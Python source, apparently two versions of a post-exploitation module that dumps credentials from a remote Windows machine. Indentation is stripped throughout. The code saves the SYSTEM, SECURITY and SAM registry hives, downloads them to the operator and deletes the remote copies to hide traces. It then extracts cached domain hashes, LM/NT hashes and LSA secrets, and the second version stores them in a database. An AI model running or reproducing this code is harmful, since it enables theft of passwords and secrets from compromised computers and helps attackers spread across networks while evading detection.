def run(self, args):
# First, we download the hives...
rep=os.path.join("data","downloads",self.client.short_name(),"hives")
try:
os.makedirs(rep)
except Exception:
pass
self.info("saving SYSTEM hives in %TEMP%...")
for cmd in ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM /y", "reg save HKLM\\SECURITY %TEMP%/SECURITY /y", "reg save HKLM\\SAM %TEMP%/SAM /y"):
self.info("running %s..." % cmd)
self.log(shell_exec(self.client, cmd))
self.success("hives saved!")
remote_temp=self.client.conn.modules['os.path'].expandvars("%TEMP%")
self.info("downloading SYSTEM hive...")
download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"), os.path.join(rep, "SYSTEM"))
self.info("downloading SECURITY hive...")
download(self.client.conn, ntpath.join(remote_temp, "SECURITY"), os.path.join(rep, "SECURITY"))
self.info("downloading SAM hive...")
download(self.client.conn, ntpath.join(remote_temp, "SAM"), os.path.join(rep, "SAM"))
self.success("hives downloaded to %s" % rep)
# Cleanup
self.info("cleaning up saves...")
try:
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SYSTEM"))
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SECURITY"))
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM"))
self.success("saves deleted")
except Exception as e:
self.warning("error deleting temporary files: %s"%str(e))
# Time to run creddump!
# HiveFileAddressSpace - Volatilty
sysaddr = HiveFileAddressSpace(os.path.join(rep, "SYSTEM"))
secaddr = HiveFileAddressSpace(os.path.join(rep, "SECURITY"))
samaddr = HiveFileAddressSpace(os.path.join(rep, "SAM"))
#detect windows version
is_vista=False
try:
if self.client.conn.modules['sys'].getwindowsversion()[0] >=6:
is_vista=True
self.info("windows > vista detected")
else:
self.info("windows < vista detected")
except:
self.warning("windows version couldn't be determined. supposing vista=False")
# Print the results
self.info("dumping cached domain passwords...")
for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
self.log("%s:%s:%s:%s" % (u.lower(), h.encode('hex'),
d.lower(), dn.lower()))
self.info("dumping LM and NT hashes...")
bootkey = get_bootkey(sysaddr)
hbootkey = get_hbootkey(samaddr,bootkey)
for user in get_user_keys(samaddr):
lmhash, nthash = get_user_hashes(user,hbootkey)
if not lmhash: lmhash = empty_lm
if not nthash: nthash = empty_nt
self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16),
lmhash.encode('hex'), nthash.encode('hex')))
self.info("dumping lsa secrets...")
secrets = get_file_secrets(os.path.join(rep, "SYSTEM"),
os.path.join(rep, "SECURITY"), is_vista)
if not secrets:
self.error("unable to read LSA secrets, perhaps the hives are corrupted")
return
for key in secrets:
self.log(key)
self.log(self.dump(secrets[key], length=16))
# The End! (hurrah)
self.success("dump was successfull!")
def windows(self):
# First, we download the hives...
#detect windows version
is_vista = False
try:
if self.client.conn.modules['sys'].getwindowsversion()[0] >= 6:
is_vista = True
self.info("windows > vista detected")
else:
self.info("windows < vista detected")
except:
self.warning(
"windows version couldn't be determined. supposing vista=False"
)
self.success("saving SYSTEM hives in %TEMP%...")
cmds = ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM",
"reg save HKLM\\SECURITY %TEMP%/SECURITY",
"reg save HKLM\\SAM %TEMP%/SAM")
if is_vista:
cmds = (x + ' /y' for x in cmds)
for cmd in cmds:
self.info("running %s..." % cmd)
self.log(shell_exec(self.client, cmd))
self.success("hives saved!")
remote_temp = self.client.conn.modules['os.path'].expandvars("%TEMP%")
self.info("downloading SYSTEM hive...")
download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"),
os.path.join(self.rep, "SYSTEM"))
self.info("downloading SECURITY hive...")
download(self.client.conn, ntpath.join(remote_temp, "SECURITY"),
os.path.join(self.rep, "SECURITY"))
self.info("downloading SAM hive...")
download(self.client.conn, ntpath.join(remote_temp, "SAM"),
os.path.join(self.rep, "SAM"))
self.success("hives downloaded to %s" % self.rep)
# Cleanup
self.success("cleaning up saves...")
try:
self.client.conn.modules.os.remove(
ntpath.join(remote_temp, "SYSTEM"))
self.client.conn.modules.os.remove(
ntpath.join(remote_temp, "SECURITY"))
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM"))
self.success("saves deleted")
except Exception as e:
self.warning("error deleting temporary files: %s" % str(e))
# Time to run creddump!
hashes = []
# HiveFileAddressSpace - Volatilty
sysaddr = HiveFileAddressSpace(os.path.join(self.rep, "SYSTEM"))
secaddr = HiveFileAddressSpace(os.path.join(self.rep, "SECURITY"))
samaddr = HiveFileAddressSpace(os.path.join(self.rep, "SAM"))
# Print the results
self.success("dumping cached domain passwords...")
for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
self.log("%s:%s:%s:%s" %
(u.lower(), h.encode('hex'), d.lower(), dn.lower()))
hashes.append({
'Login':
u.lower(),
'Hash':
"%s:%s:%s" % (h.encode('hex'), d.lower(), dn.lower()),
'Category':
'MSCACHE hash',
'CredType':
'hash'
})
self.success("dumping LM and NT hashes...")
bootkey = get_bootkey(sysaddr)
hbootkey = get_hbootkey(samaddr, bootkey)
for user in get_user_keys(samaddr):
lmhash, nthash = get_user_hashes(user, hbootkey)
if not lmhash: lmhash = empty_lm
if not nthash: nthash = empty_nt
self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(
user.Name, 16), lmhash.encode('hex'), nthash.encode('hex')))
hashes.append({
'Login':
get_user_name(user),
'Hash':
"%s:%s" % (lmhash.encode('hex'), nthash.encode('hex')),
'Category':
'NTLM hash',
'CredType':
'hash'
})
self.db.add(hashes)
self.success("Hashes stored on the database")
self.success("dumping lsa secrets...")
secrets = get_file_secrets(os.path.join(self.rep, "SYSTEM"),
os.path.join(self.rep, "SECURITY"),
is_vista)
if not secrets:
self.error(
"unable to read LSA secrets, perhaps the hives are corrupted")
return
for key in secrets:
self.log(key)
self.log(self.dump(secrets[key], length=16))
# The End! (hurrah)
self.success("dump was successfull!")
